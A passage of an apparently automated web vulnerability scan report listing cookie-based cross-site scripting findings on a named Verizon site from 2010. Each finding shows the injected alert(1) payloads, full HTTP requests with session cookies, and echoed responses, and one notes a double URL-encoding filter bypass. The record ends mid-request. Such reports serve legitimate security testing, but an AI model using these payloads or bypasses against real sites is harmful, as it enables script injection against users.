HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 72094
Expires: Sat, 20 Nov 2010 03:27:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:27:31 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:31 GMT; path=/
Set-Cookie: ContextInfo_State=TXdd694'><script>alert(1)</script>d30db65d4d8; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:31 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:31 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXDD694'><SCRIPT>ALERT(1)</SCRIPT>D30DB65D4D8 ' />
...[SNIP]...

2.954. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [dotcomsid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the dotcomsid cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64b00"-alert(1)-"81c2339fbd6 was submitted in the dotcomsid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: amlbcookie=05; SMSESSION=LOGGEDOFF; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; AprURL=https%3A%2F%2Fessentialsandextras.verizon.com%3A443%2Fapp-cust-selfservices%2Fmyvz%2Fbuy.do%3Foid%3DVX210; canigetfios=Y; dotcomsid=64b00"-alert(1)-"81c2339fbd6; vzinhomeagent=GUID=YgBkADAAMABmADAAMwA0AC0ANwAyAGUAOQAtADQANgBkADcALQA4ADcAMgAxAC0AOABjADcAOAA3ADEAOAA5ADgAMQAxAGUA&Auth=bgBvAA==&CaptchaAuth=bgBvAA==&Trans=PABUAHIAYQBuAHMAYQBjAHQAaQBvAG4ASQBkAD4AMwA5ADQAMwA2ADAAMAA8AC8AVAByAGEAbgBzAGEAYwB0AGkAbwBuAEkAZAA+AA==&IsFoundAck=ZgBhAGwAcwBlAA==&Key=VwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA=&Input=PABVAHMAZQByAFQAZQB4AHQAPgA8AFQAZQB4AHQAUgBlAGYAZQByAGUAbgBjAGUAPgBLAGUAeQBXAG8AcgBkADwALwBUAGUAeAB0AFIAZQBmAGUAcgBlAG4AYwBlAD4APABUAGUAeAB0AD4AVwBlAGIATgBvAEQAaQBhAGwAVABvAG4AZQA8AC8AVABlAHgAdAA+ADwALwBVAHMAZQByAFQAZQB4AHQAPgA=&AccountIDAuthMode=bgBvAA==; ASPSESSIONIDSABSSSST=HHHPAFBDPIGAFLDEMCPHAODD; op629myverizongum=a01502v07o26bkl00b6l5126bkl00k6ns7d46; autosuggest=on; BPSPANISH=N; PDSS=PflowId=a7a49eba9a20412b8ff824542165515c; ContextInfo_Internet=HighSpeed; UserSystemInfo=browser=QQBwAHAAbABlAE0AQQBDAC0AUwBhAGYAYQByAGkAQQBTAFAALgBzAGUAcgB2AGkAYwBlAF8AYQBzAHAAeAAgADUALgAwAA==&os=IABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEA&IP=MQA3ADQALgAxADIAMgAuADIAMwAuADIAMQA4ACwAIAAyADAANAAuADIALgAyADEANQAuADEANAA3ACwAIAAxADEAMgAuADYANAAuADEALgAxADAANwA=; ak-sf=false; CMS_TimeZoneOffset=360; ActualProtectedResource=https://essentialsandextras.verizon.com:443/app-cust-selfservices/myvz/buy.do?oid=VX210; Product=A; VzApps=STATE=TX; ProductXML=A; IHAClientIP=112.64.2.103; LOB_CATEGORY=; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; Source=CHSI; CustTrackPage=GHP; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; DSS=flowId=ee5115194db84b9b9834c670b1ec6451; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASPSESSIONIDSQAQATBB=KMLLKLLAMEBBDHEPMGMLIECK; NSC_xxx22_tqmbu_mcw=ffffffffa54c16ce45525d5f4f58455e445a4a423660; RecentlyVisited=Verizon%2520%257C%2520Local%2520%2526%2520Long%2520Distance%2520Phone@http%253A//www22.verizon.com/residentialhelp/phone%23Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; CenterSelected=0; showpromo=Y; vzpers=STATE=TX; NSC_xxx22_gzi_wasfqbjs_mcw=ffffffff895bc6de45525d5f4f58455e445a4a423660; refURL=http://www22.verizon.com/terms/; ASPSESSIONIDCSBCCATB=AMIFEODCEAGLGPHFECKFJCGD; lob=consumer; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290218421002:ss=1290217656258; NSC_xxx22_jodmveft_dbdif_mcw=ffffffff895bc69145525d5f4f58455e445a4a42366a; BusinessUnit=business; ECSPCookies=Partner=VZO&SolutionCenter=Phone&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; ASPSESSIONIDQSBQBTBA=KLLAJDLAFLAJOEADIMAPCNBB; V347=CT-2; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; VZGEO=west; RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; vzapps=STATE=TX; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; MediaSelectionCookie=A=&B=&C=nr2liYUIqsVUTefrms4XwUMiIG0Q0WQ8Vfky/1Ou14xUdaKgrLESuL7oVYJFcmRnYCQjNuRbl0c=&D=Kxbc9cX1IJa2k8/FjKMZXg==&E=&F=&G=&H=&I=; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; ASPSESSIONIDQSTCSSQS=LAJBKCHCFNBNOOFMIPDPEDIH; vzAppID=; op629myverizonliid=a01502v07o26bkl00b6l5126bkl00k6ns7d46; myservices=vzdock=N; CP=null*;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 77874
Expires: Sat, 20 Nov 2010 03:27:26 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 03:27:26 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:26 GMT; path=/
Set-Cookie: ContextInfo_State=TX; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:26 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 03:27:26 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<script type="text/javascript">
function startmenu()
{
}
var mvzOptIn="N";
var strdotcomval = "64b00"-alert(1)-"81c2339fbd6"
if(mvzOptIn != 'Y' || strdotcomval == "")
{
    var m_view = new VZT.MasterNavView();
    var m_model = {container: document.getElementB
...[SNIP]...

2.955. http://www22.verizon.com/Residential/aboutFiOS/widgets/widgets.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /Residential/aboutFiOS/widgets/widgets.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a49de'><script>alert(1)</script>ec31fe281d2 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /Residential/aboutFiOS/widgets/widgets.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXa49de'><script>alert(1)</script>ec31fe281d2; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73636
Expires: Sat, 20 Nov 2010 00:11:20 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:11:20 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/
Set-Cookie: ContextInfo_State=TXa49de'><script>alert(1)</script>ec31fe281d2; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:11:20 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXA49DE'><SCRIPT>ALERT(1)</SCRIPT>EC31FE281D2 ' />
...[SNIP]...

2.956. http://www22.verizon.com/residential/bundles/bundlesoverview/bundlesoverview.htm [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/bundles/bundlesoverview/bundlesoverview.htm

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c8020'><script>alert(1)</script>7e15a2d3a4 was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/bundlesoverview/bundlesoverview.htm HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXc8020'><script>alert(1)</script>7e15a2d3a4; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 112507
Expires: Sat, 20 Nov 2010 00:15:50 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:50 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/
Set-Cookie: ContextInfo_State=TXc8020'><script>alert(1)</script>7e15a2d3a4; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:50 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXC8020'><SCRIPT>ALERT(1)</SCRIPT>7E15A2D3A4 ' />
...[SNIP]...

2.957. http://www22.verizon.com/residential/bundles/overview [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/bundles/overview

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4e8e6'><script>alert(1)</script>b8d520065ab was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/bundles/overview HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4e8e6'><script>alert(1)</script>b8d520065ab; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 110967
Expires: Sat, 20 Nov 2010 00:15:43 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:43 GMT
Connection: close
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=TX4e8e6'><script>alert(1)</script>b8d520065ab; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/
Set-Cookie: ContextInfo_State=; expires=Fri, 19-Nov-2010 00:15:43 GMT; path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="head"><meta http-equiv="X-UA-Compatible
...[SNIP]...
<input type='hidden' id='locationInfo' value='TX4E8E6'><SCRIPT>ALERT(1)</SCRIPT>B8D520065AB ' />
...[SNIP]...

2.958. http://www22.verizon.com/residential/internet [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/internet

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload bf607'><script>alert(1)</script>af83f93894c was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residential/internet HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TXbf607'><script>alert(1)</script>af83f93894c; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 73115
Expires: Sat, 20 Nov 2010 00:16:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:16:28 GMT
Connection: close
Set-Cookie: ContextInfo_State=TXbf607'><script>alert(1)</script>af83f93894c; path=/
Set-Cookie: ContextInfo_LoopQual=; path=/


<html xmlns:vz>
<head id="_ctl0_head"><title>
   Verizon | Internet
</title><meta name="keywords" content="verizon internet services, verizon internet products, ISP, internet service, fios internet
...[SNIP]...
<input type='hidden' id='locationInfo' value='TXBF607'><SCRIPT>ALERT(1)</SCRIPT>AF83F93894C ' />
...[SNIP]...

2.959. http://www22.verizon.com/residential/specialoffers/ [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residential/specialoffers/

Issue detail

The value of the vzapps cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e20b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efd5bffbcc6f was submitted in the vzapps cookie. This input was echoed as 4e20b"><img src=a onerror=alert(1)>fd5bffbcc6f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the vzapps cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /residential/specialoffers/ HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: Source=CHSI; vzapps=STATE=TX4e20b%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253efd5bffbcc6f; NSC_xxx22_tqmbu_mcw=ffffffffa54c16f345525d5f4f58455e445a4a423660; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; refURL=http://www22.verizon.com/Residential/HighSpeedInternet/HSIvsCable/HSIvsCable.htm?CMP=BAC-MXT_D_P2_CS_Z_Q_N_Z330; vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; CP=null*; oo_learn=42336e023618bb8c0d4143d9db13d5e2~1; ASP.NET_SessionId=zj1l4v55cxoz4e55aa3kjqe3; ak-sf=false; CMS_TimeZoneOffset=360;

Response (redirected)

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
X-Powered-By: ASP.NET
Content-Type: text/html
Expires: Sat, 20 Nov 2010 00:15:44 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 00:15:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ASPSESSIONIDQQCTSBDQ=IGIKCPNBAEMHJEFBAIDLEPPI; path=/
Set-Cookie: NSC_xxx22_tqmbu_mcw=ffffffff895bc67c45525d5f4f58455e445a4a423660;path=/
Content-Length: 126538

<!-- Vignette V6 Fri Nov 19 16:15:44 2010 -->


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>

<!-- mp_trans_remove_start -->
<title>Verizon | Residential Specia
...[SNIP]...
<script type="text/javascript" src="/residential/specialoffers/zipcheck?st=TX4e20b"><img src=a onerror=alert(1)>fd5bffbcc6f">
...[SNIP]...

2.960. http://www22.verizon.com/residentialhelp [ECSPCookies cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp

Issue detail

The value of the ECSPCookies cookie is copied into the HTML document as plain text between tags. The payload 4fea9<script>alert(1)</script>38ddcfffc57 was submitted in the ECSPCookies cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp?fromDotNet=true HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TX; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=4fea9<script>alert(1)</script>38ddcfffc57; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=360; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; refURL=http://www22.verizon.com/content/verizonglobalhome/ghp_business.aspx; BusinessUnit=business

Response (redirected)

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 46458
Expires: Sat, 20 Nov 2010 02:12:53 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Sat, 20 Nov 2010 02:12:53 GMT
Connection: close
Set-Cookie: ak-sf=false; expires=Sat, 20-Nov-2010 02:17:53 GMT; path=/residentialhelp/; domain=verizon.com


<HTML xmlns:vz>
   <HEAD id="ctl00_head"><title>
   Verizon | Residential Support
</title><meta http-equiv="Content-Type" content="text/html;    charset=windows-1251" /><meta content="Microsoft Vis
...[SNIP]...
</strong> 4fea9<script>alert(1)</script>38ddcfffc57</span>
...[SNIP]...

2.961. http://www22.verizon.com/residentialhelp [vzapps cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www22.verizon.com
Path:   /residentialhelp

Issue detail

The value of the vzapps cookie is copied into the HTML document as plain text between tags. The payload bbbc1<script>alert(1)</script>763928accef was submitted in the vzapps cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /residentialhelp?fromDotNet=true HTTP/1.1
Host: www22.verizon.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: RegistrationApp=SessionId=8d2315d0-c961-442f-b3ac-b606fe73e7e0; VZGEO=west; NSC_xxx22_gzi_fsfh_mcw=ffffffff895bc6f745525d5f4f58455e445a4a423660; vzAppID=; ASP.NET_SessionId=xssjr145hgrtk055l4w5jujb; V347=CT-2; LOB_CATEGORY=; NSC_xxx22_gzi_nzbddu_mcw=ffffffff895bc6f845525d5f4f58455e445a4a423660; Product=A; ProductXML=A; vzpers=STATE=TX; canigetfios=Y; showpromo=Y; vzapps=STATE=TXbbbc1<script>alert(1)</script>763928accef; ContextInfo_Internet=HighSpeed; ReferralSitenet=http://webmail.verizon.net/signin/login.jsp?src=sam&err=1011; ECSPCookies=Partner=VZO&SolutionCenter=HighSpeed&OOFState=&SupportCenter=&Internet=HighSpeed&TV=&Wireless=; IHAClientIP=112.64.2.103; CMS_TimeZoneOffset=360; RecentlyVisited=Verizon%2520%257C%2520High%2520Speed%2520Internet%2520-%2520What%2520is%2520Verizon%2520Your%2520Domain%253F@http%253A//www22.verizon.com/ResidentialHelp/HighSpeed/Email/Setup+And+Use/QuestionsOne/121547.htm%23; ASPSESSIONIDAACQSSTQ=HFFMAEHCEIGODAGPDJIINHAB; WT_FPC=id=25c0e3eb152dc13a7901290217656258:lv=1290217656258:ss=1290217656258; NSC_xxx22_tqmbu_mcw=ffffffff895bc66745525d5f4f58455e445a4a423660; CustTrackPage=GHP; RecentlyVisitedOffers=fios_fiftv_dp,FiOS Double Play,69.99*/^; CP=null*; 